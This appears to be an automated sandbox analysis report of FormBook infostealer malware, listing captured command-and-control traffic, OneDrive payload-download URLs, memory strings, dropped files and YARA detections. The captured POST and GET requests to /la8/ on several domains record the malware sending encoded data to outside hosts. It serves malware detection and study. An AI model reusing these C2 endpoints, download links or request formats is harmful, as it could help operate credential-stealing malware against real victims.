    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.energyccm.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.energyccm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyccm.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 32 41 4e 59 49 45 4a 5f 37 72 45 36 38 56 67 54 68 34 4d 42 39 36 61 53 6c 67 77 6b 61 4d 6e 62 52 72 69 50 35 63 4d 6a 30 62 6f 4e 38 64 58 41 72 6a 34 4d 70 6a 53 68 6a 33 33 47 38 77 42 2d 35 77 75 4c 4a 75 30 48 61 75 55 36 53 30 6d 77 43 4f 7a 6c 62 62 4f 50 59 4c 53 45 56 77 32 67 48 45 46 75 45 50 53 55 41 69 41 43 47 44 47 75 69 6e 66 6b 4e 34 57 72 42 2d 4f 6e 46 52 58 70 4a 58 56 61 79 42 78 78 64 57 4c 4e 6d 5a 6c 47 46 36 4e 51 79 75 49 6a 69 72 4e 64 4f 75 74 4e 53 6f 52 2d 31 34 54 50 36 56 42 6e 51 59 37 62 42 71 68 4c 47 68 33 4c 61 67 30 4b 49 7a 4b 48 55 6c 4b 75 44 75 78 6d 4f 62 37 6a 56 4d 53 55 46 44 57 30 6f 6c 4a 56 4c 35 56 4c 55 50 78 58 7a 72 4e 71 28 75 6e 30 6b 62 76 41 64 6c 49 61 72 42 4f 49 28 63 66 49 67 68 76 73 59 75 6b 77 62 4e 64 71 4d 73 71 72 30 2d 6c 75 51 6b 6f 55 52 53 6b 78 52 34 49 32 79 6d 70 4a 76 44 78 75 6a 4e 53 34 6c 65 56 72 63 63 59 4e 59 74 46 49 62 5a 43 69 73 4b 39 76 4c 34 41 68 6b 5a 65 43 69 37 49 47 52 5f 31 63 68 56 33 50 6e 32 34 43 56 67 4a 42 56 56 32 31 42 65 72 4f 6a 6a 68 55 44 34 72 67 67 77 70 34 7a 50 78 75 47 33 41 74 56 47 63 38 63 7a 6f 72 68 53 63 50 6b 79 77 4c 6b 77 4f 57 7a 37 6d 59 7a 54 4f 4c 6f 37 59 74 71 67 29 2e 00 6d 32 64 61 52 54 67 Data Ascii: 8po=2ANYIEJ_7rE68VgTh4MB96aSlgwkaMnbRriP5cMj0boN8dXArj4MpjShj33G8wB-5wuLJu0HauU6S0mwCOzlbbOPYLSEVw2gHEFuEPSUAiACGDGuinfkN4WrB-OnFRXpJXVayBxxdWLNmZlGF6NQyuIjirNdOutNSoR-14TP6VBnQY7bBqhLGh3Lag0KIzKHUlKuDuxmOb7jVMSUFDW0olJVL5VLUPxXzrNq(un0kbvAdlIarBOI(cfIghvsYukwbNdqMsqr0-luQkoURSkxR4I2ympJvDxujNS4leVrccYNYtFIbZCisK9vL4AhkZeCi7IGR_1chV3Pn24CVgJBVV21BerOjjhUD4rggwp4zPxuG3AtVGc8czorhScPkywLkwOWz7mYzTOLo7Ytqg).m2daRTg
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.energyccm.comConnection: closeContent-Length: 138317Cache-Control: no-cacheOrigin: http://www.energyccm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyccm.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 32 41 4e 59 49 45 39 42 35 62 41 6e 37 6a 55 59 7a 4c 67 6b 33 37 32 63 7a 33 6f 33 54 37 4c 50 63 59 6d 68 35 64 39 71 74 4a 41 6c 35 39 4c 41 74 67 63 50 6c 6a 53 69 79 6e 33 48 32 51 63 48 77 48 71 31 4a 71 4d 74 61 75 4d 37 62 58 4f 70 43 65 7a 4d 59 37 53 5f 61 4b 32 55 56 7a 44 77 45 6e 6f 37 42 50 65 55 64 69 59 41 49 47 75 50 6f 44 4f 31 48 6f 4b 71 44 37 36 36 5a 7a 54 52 4a 78 64 6f 31 44 56 5f 4d 51 44 38 6a 5a 30 76 42 74 52 68 34 65 4e 72 6e 71 59 5a 54 5a 39 42 65 4e 78 32 37 61 37 4f 35 6d 78 70 58 61 6a 4d 46 62 6c 2d 45 51 48 31 61 6a 45 61 45 6c 79 53 44 45 57 32 45 50 73 75 57 35 4c 6c 4a 4c 4f 4d 55 57 37 4f 7a 6d 42 54 55 4d 78 4d 48 76 63 50 30 6f 35 36 69 61 72 48 6d 70 62 4d 4f 55 56 74 6d 33 75 41 39 63 76 6e 70 43 50 33 42 50 45 43 59 4c 4e 51 53 38 71 41 35 65 6c 36 45 30 35 74 56 6a 78 38 47 37 68 6e 79 68 31 65 6c 79 5a 7a 33 76 57 53 36 76 55 56 65 73 51 42 58 5f 39 77 4e 59 47 70 37 70 68 62 46 59 42 6c 67 59 79 56 69 37 4a 31 52 5f 5a 32 67 68 28 50 39 47 59 52 55 44 68 4e 41 46 33 74 4e 75 37 51 74 77 45 54 44 34 7a 67 68 46 74 43 77 65 31 75 42 68 73 75 56 6e 63 38 59 44 6f 72 74 79 64 44 6a 78 64 38 37 42 6e 65 69 72 4b 47 33 45 4f 63 73 4b 39 68 33 47 65 61 5a 62 37 37 6d 56 7e 33 36 46 5a 6c 42 43 48 71 63 36 79 59 35 59 32 51 7a 6e 6c 56 35 58 63 32 38 37 73 75 37 45 68 55 35 6b 6b 6b 74 46 61 6d 34 41 6d 53 68 51 74 2d 61 58 4a 55 37 52 7a 62 66 5a 74 76 52 6a 45 68 47 47 6f 66 78 59 67 37 75 52 77 5a 35 4a 79 76 44 68 71 61 46 7a 55 4c 75 6d 37 2d 35 51 4d 33 7e 66 4b 6f 5a 50 67 59 49 35 63 58 75 71 63 54 76 63 71 4c 64 6a 62 79 7e 39 73 54 64 39 56 6e 5a 4a 73 43 75 59 49 53 41 45 66 4e 4d 5f 6a 52 43 73 59 50 31 55 49 36 30 67 35 57 67 43 4f 5f 55 52 73 36 58 37 4f 69 49 52 4d 4c 48 62 6d 4d 71 58 72 4d 4b 6b 63 62 79 49 6e 7a 4d 51 74 36 68 64 4c 4a 4f 59 62 4e 75 43 67 56 58 38 43 4a 7e 6b 62 32 41 79 44 38 69 69 47 37 79 59 6c 4c 79 70 28 66 71 33 62 43 35 70 30 50 77 2d 49 4d 6a 68 6d 44 64 78 64 30 28 68 5a 74 77 52 74 7a 72 51 44 63 30 5f 61 5a 75 36 67 4f 53 71 34 46 6e 6d 55 55 72 38 53 58 4b 63 30 69 7e 65 71 72 36 6e 37 59 63 6b 4e 61 35 56 77 42 28 56 37 48 6f 49 65 50 34 6d 5a 32 6c 6c 53 44 28 46 52 55 41 41 47 65 71 6e 50 76 78 5a 31 68 37 56 69 66 68 6f 4a 37 35 63 45 33 69 64 30 6d 61 46 68 71 4a 4f 76 73 31 76 53 62 56 74 66 5a 47 63 42 7a 43 4f 6c 6b 42 4e 67 2d 6e 54 75 5a 70 53 75 49 59 57 4e 6e 49 6c 50 35 75 4f 72 41 4d 6d 75 37 62 31 34 59 49 2d 58 5f 77 37 38 45 59 47 31 6e 58 72 49 66 45 36 55 4f 6c 44 64 55 71 5a 6f 2d 43 2d 7e 76 28 37 33 57 6a 6d 74 41 4d 56 6d 6b 61 6
    Source: C:\Windows\explorer.exeCode function: 9_2_05E095A2 getaddrinfo,SleepEx,setsockopt,recv,recv,9_2_05E095A2
    Source: global trafficHTTP traffic detected: GET /la8/?8po=2xb78DdDEjM3dlhHAL8WnJaCWoUJjTl6z61ZhAZlGEen8KRUhO+jiP2BW1Rd3dy3qp7J&pJE=0PUX56wpFRW HTTP/1.1Host: www.skinessenceparadise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?8po=BCnuU+Adz6Y2RGA7NbUb+8TCvCHQh5V6jbe9cKk+/8jR+xdU1m6ihAfp69aseyTDC6/r&pJE=0PUX56wpFRW HTTP/1.1Host: www.mansiobok3.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?8po=VlwaRMNinHTL3n/MIazSEXRtTNo7NjMY9TLzowT7dmWR/3/ZlIsT4/UKlCxCKApsqzIr&pJE=0PUX56wpFRW HTTP/1.1Host: www.pappinlawoffice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?8po=+iBiWgsd5uRCkihNyv5YpeyizloqSo7JCMLz9O439Lw1296fjgRjrTPbhHCe7wMr0Xfu&pJE=0PUX56wpFRW HTTP/1.1Host: www.energyccm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: unknownDNS traffic detected: queries for: onedrive.live.com
    Source: unknownHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.mansiobok3.infoConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mansiobok3.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mansiobok3.info/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 4a 67 72 55 4b 59 34 61 7e 2d 39 41 4f 58 46 6c 4e 74 77 41 6b 35 33 51 67 41 54 58 33 4c 68 54 32 75 6e 38 42 74 55 46 6f 38 43 56 77 67 5a 33 33 32 54 67 6c 57 53 58 6f 64 44 32 63 6e 28 31 4a 5a 4b 68 64 6f 33 39 45 6c 49 44 43 41 38 4b 4e 6c 51 6c 36 6c 5a 69 4c 39 76 57 58 55 45 66 47 6b 68 4b 76 35 34 4b 68 62 73 52 68 53 33 51 64 72 66 45 49 32 6e 65 63 77 4b 42 67 38 63 57 58 41 53 42 30 75 31 6c 70 6d 61 6d 6d 48 31 64 66 38 4d 2d 7a 62 32 48 6e 4c 44 53 31 72 54 51 54 6c 39 33 7a 47 6b 4d 74 76 50 62 51 52 76 4f 69 33 4d 6a 35 34 77 6a 38 56 36 5a 49 6a 4b 6f 67 63 36 45 79 46 31 61 54 45 56 4b 33 48 4d 4d 64 4f 57 46 4b 44 6a 73 4a 31 6d 53 49 69 56 4b 41 5a 71 78 50 2d 53 6a 32 6e 58 6c 44 4d 30 59 68 5a 45 6e 55 67 66 71 38 48 49 42 6c 54 32 70 7e 4d 42 48 70 4b 6a 46 43 63 70 71 4f 57 4d 4d 6c 70 79 59 61 49 41 51 53 68 39 69 71 68 67 77 59 53 6f 79 67 67 61 4c 41 76 31 6b 4b 73 44 47 55 6c 41 63 33 34 30 71 4f 5f 43 45 46 31 48 79 31 7a 6d 38 50 78 6c 77 5a 54 38 59 62 78 59 72 46 67 72 67 75 4a 4e 73 55 61 7e 42 55 58 34 75 6b 6c 41 76 44 30 48 58 34 48 78 76 6b 53 50 38 6d 75 59 65 67 4b 71 44 28 43 28 41 56 70 37 64 7a 57 70 78 44 31 69 76 4f 4d 6c 7a 7e 30 49 34 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8po=JgrUKY4a~-9AOXFlNtwAk53QgATX3LhT2un8BtUFo8CVwgZ332TglWSXodD2cn(1JZKhdo39ElIDCA8KNlQl6lZiL9vWXUEfGkhKv54KhbsRhS3QdrfEI2necwKBg8cWXASB0u1lpmammH1df8M-zb2HnLDS1rTQTl93zGkMtvPbQRvOi3Mj54wj8V6ZIjKogc6EyF1aTEVK3HMMdOWFKDjsJ1mSIiVKAZqxP-Sj2nXlDM0YhZEnUgfq8HIBlT2p~MBHpKjFCcpqOWMMlpyYaIAQSh9iqhgwYSoyggaLAv1kKsDGUlAc340qO_CEF1Hy1zm8PxlwZT8YbxYrFgrguJNsUa~BUX4uklAvD0HX4HxvkSP8muYegKqD(C(AVp7dzWpxD1ivOMlz~0I4BA).
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:58:21 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 61 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /la8/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmpString found in binary or memory: http://microsoft.co
    Source: Dynamitbom9.exe, 0000000A.00000003.1337755727.0000000000989000.00000004.00000001.sdmpString found in binary or memory: http://mscrl.__
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmpString found in binary or memory: http://mscrl.micr
    Source: explorer.exe, 00000009.00000000.1318100688.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://ns.microsoftom/photo/1.2/tD
    Source: Dynamitbom9.exe, 0000000A.00000003.1337755727.0000000000989000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digiI
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: explorer.exe, 00000009.00000002.2787480435.00000000030D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000009.00000002.2806342066.0000000005E26000.00000040.00000001.sdmpString found in binary or memory: http://www.energyccm.com
    Source: explorer.exe, 00000009.00000002.2806342066.0000000005E26000.00000040.00000001.sdmpString found in binary or memory: http://www.energyccm.com/la8/
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/
    Source: Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/_
    Source: Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/mQ
    Source: Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mAtfAsq6lZLeKEIYGIGzyPviD7kCpXiU0DzP50t27JsPKq3EruwZK0DlryXqDUdOM
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mFE21wcHHQ4vRoVluodpr9FOLpOrbqvsq79ovU48nYkt3-9gzsfp-9fCG3Db2uWAL
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mgfnu1PJWJr064ZL9YlIV3jl40tm0q28BBvNE2xZCPCi78baeQwIGk3HYt-PyWvAL
    Source: Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mzBYd9A3cfPXwSM0EhsP0kiqWd7NUCtcZWlW0_nUmR7Hn0ep5nddt_IgA5LG9KJU-
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000A.00000002.1356109432.0000000000920000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: Dynamitbom9.exe, 0000000A.00000002.1356109432.0000000000920000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/(
    Source: Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/H
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/X:o
    Source: Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000022.00000002.2646148315.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B3B98222C3EF96E0&resid=B3B98222C3EF96E0%21184&authkey=AHHJ6Y6
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Detected FormBook malwareShow sources
    Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogri.iniJump to dropped file
    Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogrf.iniJump to dropped file
    Source: C:\Windows\SysWOW64\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogrv.iniJump to dropped file
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000001D.00000002.2392368169.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000000.1158141419.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000020.00000002.2488679059.000000000247D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000005.00000000.1134321280.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000021.00000000.2475390831.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000003.00000000.1127847774.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000020.00000000.2399255598.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000002.00000002.1131426501.000000000243D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001D.00000000.2296829574.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001E.00000002.2409357508.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000003.00000002.1166950255.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000000.1179724093.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001E.00000000.2313927729.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000005.00000002.1236797846.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000002.00000000.1094133330.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000021.00000002.2552234580.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001F.00000002.2490871348.000000000245D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000002.1285866983.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000022.00000000.2551368567.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
